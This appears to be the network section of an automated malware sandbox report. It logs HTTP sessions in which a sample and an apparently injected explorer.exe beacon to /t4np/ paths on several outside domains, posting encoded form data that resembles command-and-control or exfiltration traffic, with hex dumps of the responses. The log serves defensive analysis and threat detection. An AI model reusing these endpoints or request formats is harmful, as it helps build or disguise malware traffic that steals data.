                                                                            Data Raw: 65 6b 44 57 64 58 6d 78 3d 28 50 51 4d 33 59 50 4d 61 32 7a 2d 50 59 50 33 34 70 4a 4b 37 70 6e 6c 7a 78 6a 79 6f 72 31 46 7a 36 62 64 51 56 58 45 28 6d 58 48 74 57 39 6b 52 4c 41 55 6e 46 76 4e 5a 77 38 63 55 4a 34 45 30 73 52 7a 72 4a 4e 62 58 39 5a 4b 51 48 44 7a 5a 54 77 72 79 57 49 55 70 58 42 64 50 32 31 55 44 35 68 62 53 63 68 7a 28 55 49 77 77 70 6e 73 4f 4d 76 7a 36 6b 67 67 63 59 6e 6e 4b 33 35 31 6f 53 54 54 53 6e 44 58 48 56 63 4f 51 56 43 4a 39 39 69 75 58 65 6e 30 6a 48 43 59 65 59 69 68 49 47 6f 41 79 64 48 71 38 57 4b 33 53 4f 38 36 74 51 29 2e 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
                                                                            Mar 21, 2023 09:12:10.917695045 CET6182INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 21 Mar 2023 08:12:10 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 7ab4ba77cf4a2c63-FRA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b 1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf 1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a 9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff 0d 0a
                                                                            Data Ascii: d4LN0Dw)j%hRQ)GR{GIuhn}[xn-6W=8GU]T!!g-l(YRT<_;]!*|M4a2rg)o3Na$RY&y
                                                                            Mar 21, 2023 09:12:10.917721987 CET6182INData Raw: 61 0d 0a 03 00 c1 a4 b0 e3 04 01 00 00 0d 0a
                                                                            Data Ascii: a
                                                                            Mar 21, 2023 09:12:10.917737961 CET6182INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            11192.168.2.549710172.67.194.22580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:12:13.411086082 CET6182OUTGET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1
                                                                            Host: www.metatv.app
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Mar 21, 2023 09:12:13.485526085 CET6183INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 21 Mar 2023 08:12:13 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 7ab4ba87de882c3e-FRA
                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 74 61 74 76 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                            Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.metatv.app Port 80</address></body></html>
                                                                            Mar 21, 2023 09:12:13.485560894 CET6183INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.549701188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.54970274.208.236.13180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:11:27.575243950 CET6123OUTGET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1
                                                                            Host: www.findmyoriginstory.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Mar 21, 2023 09:11:27.708056927 CET6124INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 626
                                                                            Connection: close
                                                                            Date: Tue, 21 Mar 2023 08:11:27 GMT
                                                                            Server: Apache
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.549703217.160.0.22980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:11:38.888617039 CET6125OUTPOST /t4np/ HTTP/1.1
                                                                            Host: www.emprendizajesocial.com
                                                                            Connection: close
                                                                            Content-Length: 190
                                                                            Cache-Control: no-cache
                                                                            Origin: http://www.emprendizajesocial.com
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://www.emprendizajesocial.com/t4np/
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Data Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
                                                                            Mar 21, 2023 09:11:38.913914919 CET6126INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Date: Tue, 21 Mar 2023 08:11:38 GMT
                                                                            Server: Apache
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.549704217.160.0.22980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:11:42.533204079 CET6127OUTGET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1
                                                                            Host: www.emprendizajesocial.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Mar 21, 2023 09:11:42.559078932 CET6127INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html
                                                                            Content-Length: 596
                                                                            Connection: close
                                                                            Date: Tue, 21 Mar 2023 08:11:42 GMT
                                                                            Server: Apache
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.54970554.85.86.21180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:11:52.801453114 CET6129OUTPOST /t4np/ HTTP/1.1
                                                                            Host: www.brunaeleandro.com
                                                                            Connection: close
                                                                            Content-Length: 190
                                                                            Cache-Control: no-cache
                                                                            Origin: http://www.brunaeleandro.com
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://www.brunaeleandro.com/t4np/
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Data Raw: 65 6b 44 57 64 58 6d 78 3d 65 50 49 69 41 6e 77 2d 54 66 4f 72 6f 48 65 71 66 5f 35 72 68 4b 6c 74 30 78 4b 32 4c 4d 79 66 4f 56 4e 53 32 75 66 5a 77 73 78 37 43 32 42 35 49 76 34 33 57 6f 6d 51 58 76 7e 58 67 71 37 4a 70 4d 49 68 52 79 53 6e 36 36 36 67 66 51 54 47 4f 38 6e 6b 33 68 39 4b 30 30 58 59 44 5f 42 34 68 36 4e 38 4f 6f 6a 5a 4c 4f 35 69 53 36 63 51 48 36 74 6c 4b 63 77 74 59 46 78 55 56 61 51 75 69 51 46 6e 59 48 69 75 65 6d 55 63 72 53 4d 37 47 51 6b 6a 30 50 46 70 6c 39 36 47 6f 52 45 7a 35 33 39 39 4e 38 58 70 6e 43 54 63 66 74 6d 51 73 77 29 2e 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
                                                                            Mar 21, 2023 09:11:52.954804897 CET6130INHTTP/1.1 200 OK
                                                                            date: Tue, 21 Mar 2023 08:11:52 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 9503
                                                                            set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/
                                                                            set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=None
                                                                            server: Apache
                                                                            vary: X-Forwarded-Proto,Accept-Encoding,User-Agent
                                                                            set-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=None
                                                                            content-encoding: gzip
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 5b 73 db c6 96 ee b3 fc 2b da 4c 6d 53 9a 10 20 2e c4 4d 12 ed 72 14 27 e3 94 7c 39 b6 93 7d 66 ab 5c ac 26 d1 24 61 83 00 03 80 ba 24 f1 8f d9 35 0f 53 73 aa e6 e9 d4 79 39 8f c7 7f ec 7c ab 71 21 40 82 12 95 38 79 18 c5 91 80 46 f7 ea 75 5f ab 2f 68 9c 3e fc f6 d5 d9 bb 7f 7b fd 8c cd b3 45 f8 f8 c1 69 fe 87 b1 d3 b9 e0 3e 5d e0 72 21 32 8e e7 d9 52 11 3f af 82 cb 61 e7 2c 8e 32 11 65 ca bb 9b a5 e8 b0 49 7e 37 ec 64 e2 3a eb 13 80 13 36 99 f3 24 15 d9 70 95 4d 15 b7 c3 fa 12 64 18 44 1f 59 22 c2 61 27 9d c7 49 36 59 65 2c 40 e3 0e 9b 27 62 3a ec f4 fb 13 3f 52 78 8a 76 a9 12 8a 19 9f dc a8 13 9e f2 44 9d c4 8b fe 94 5f 52 65 15 bf 9e 5c 0e 0d 09 f3 34 0b b2 50 3c 7e fd f9 9f b3 20 e2 2c fa fc ef 31 13 11 e1 93 70 9f b3 df d8 59 d9 fc b4 9f 57 7d 90 13 13 f1 85 18 76 2e 03 71 b5 04 22 35 12 ae 02 3f 9b 0f 7d 81 be 84 22 6f 7a 2c 88 82 2c e0 a1 92 4e 78 28 86 ba aa 75 1e 3f 78 50 b2 25 87 34 8b e3 59 28 94 34 c8 84 72 29 92 60 1a 4c 78 16 10 69 15 e4 ef 5f 5c 67 8b 6f ff 1e 3c 7d 75 a9 bc 5d 0d 7e f1 94 f4 c7 a7 37 3f fc f0 f2 c7 ef b3 70 7e f3 d3 37 2f 56 df 70 f3 4c 9f fe 9c 4a da a8 87 74 92 04 cb 8c a5 c9 64 d8 21 fe a7 c7 fd fe 38 51 01 4f 24 cb 24 48 85 7a 15 8c 53 62 4a dc 1f f3 28 12 89 fa 21 7d 42 58 3c f7 87 8e 6b 69 9e d0 34 c5 b1 1d 5f 19 98 86 ad 78 96 e1 29 53 cd b7 0c 73 e2 ea a6 33 e9 3c 3e ed e7 9d a0 c3 07 ad fd 89 c5 58 f8 6a 06 49 4f e3 64 21 45 91 17 7d 48 1b ad 4f 1f 2a 0a fb d7 77 2f ce 2d f6 76 1e 2c 18 8f 7c f6 46 a4 cb 38 a2 aa ec f9 33 97 a5 ab 25 b1 9b c5 d3 a2 a2 08 c5 02 c4 a4 b2 f2 42 f8 01 67 3f af c0 3e 91 32 45 79 2c 41 5e 04 53 16 66 68 ce bc f7
                                                                            Data Ascii: }[s+LmS .Mr'|9}f\&$a$5Ssy9|q!@8yFu_/h>{Ei>]r!2R?a,2eI~7d:6$pMdDY"a'I6Ye,@'b:?RxvD_Re\4P<~ ,1pYW}v.q"5?}"oz,,Nx(u?xP%4Y(4r)`Lxi_\go<}u]~7?p~7/VpLJtd!8QO$$HzSbJ(!}BX<ki4_x)Ss3<>XjIOd!E}HO*w/-v,|F83%Bg?>2Ey,A^Sfh
                                                                            Mar 21, 2023 09:11:52.954843044 CET6132INData Raw: 8f 77 f1 24 4e 53 75 c1 af a1 3e 12 bf 10 4c 91 7a 68 a5 f3 e0 b2 6f aa 8e aa ad ef 37 10 bf 07 c8 a4 22 a7 af ab 26 60 96 05 8b 20 da 80 7a fa f0 42 44 7e 30 7d 4f 74 e4 bc 89 97 22 62 b3 84 2f e7 92 b8 52 81 96 09 1e 24 d9 cd b0 13 cf 8e 49 74
                                                                            Data Ascii: w$NSu>Lzho7"&` zBD~0}Ot"b/R$It#RT:h5JNt|QnZk:8MHA&CXz+=d,2[p&dA/Y/lljALar\$G8*T~\CVR>pK$<
                                                                            Mar 21, 2023 09:11:52.954863071 CET6133INData Raw: 54 7e d4 72 e9 8e a2 f1 37 f1 f5 b0 a3 31 0d 78 0e 98 ae db 28 2d 82 51 47 57 e1 64 af 17 61 94 e6 1e b5 10 f3 95 a9 c6 c9 ac 6f 68 9a d6 47 07 45 95 e3 6b 1a 52 b5 55 d4 41 6f 5f 3e ed 54 a2 99 49 ce ff 6b bc 90 1c 4f e2 8f 60 81 f4 df c5 9d b2
                                                                            Data Ascii: T~r71x(-QGWdaohGEkRUAo_>TIkO` t$+b)~XM"C.'Ji!]dLn \7G5l;.uTcG_'WWg3he9C?/sm=GVT<qn
                                                                            Mar 21, 2023 09:11:52.954883099 CET6134INData Raw: 66 c9 52 73 60 99 96 d9 83 43 d6 5d 8a c5 1e 22 01 ac d8 a1 4b 58 b1 05 ba c8 8a 1d 06 ef 8d 70 65 ba 10 32 49 16 f1 16 f6 cf 1c 87 c2 b2 06 cf d4 23 33 47 20 86 82 23 d0 21 14 22 f8 23 18 53 31 bc 1f 9c 3e 2a 0f e0 93 0c af 28 b5 ec 81 e5 da 0c
                                                                            Data Ascii: fRs`C]"KXpe2I#3G #!"#S1>*(16L*Qz;`#V; !zlEs<H`&i!vA)4=pdDd(I!)2!!<|(@7qMw)2#<t"y*;F1Z`TQDu&a(
                                                                            Mar 21, 2023 09:11:52.954902887 CET6135INData Raw: b6 9f 5b 02 6a bf 5f 70 b7 3e 2d f3 3b a3 67 0b ac 7e 5c 52 fe f8 55 21 91 2f 04 58 c0 71 21 8d ea 3c 7e e6 07 45 56 b4 17 e0 3f d4 29 ed d0 05 45 d7 cb 18 83 f5 ff 41 37 ec 19 dd 7c 21 9a 30 26 83 af 48 63 50 f5 bc bc fc 42 a0 61 64 cb 25 e0 23
                                                                            Data Ascii: [j_p>-;g~\RU!/Xq!<~EV?)EA7|!0&HcPBad%#W_2M?#Vne'' M?3v?wV$pf;X~Ek&-$JHj[;o|'2Flfy)(XY.hu%7iEy#!KzaE
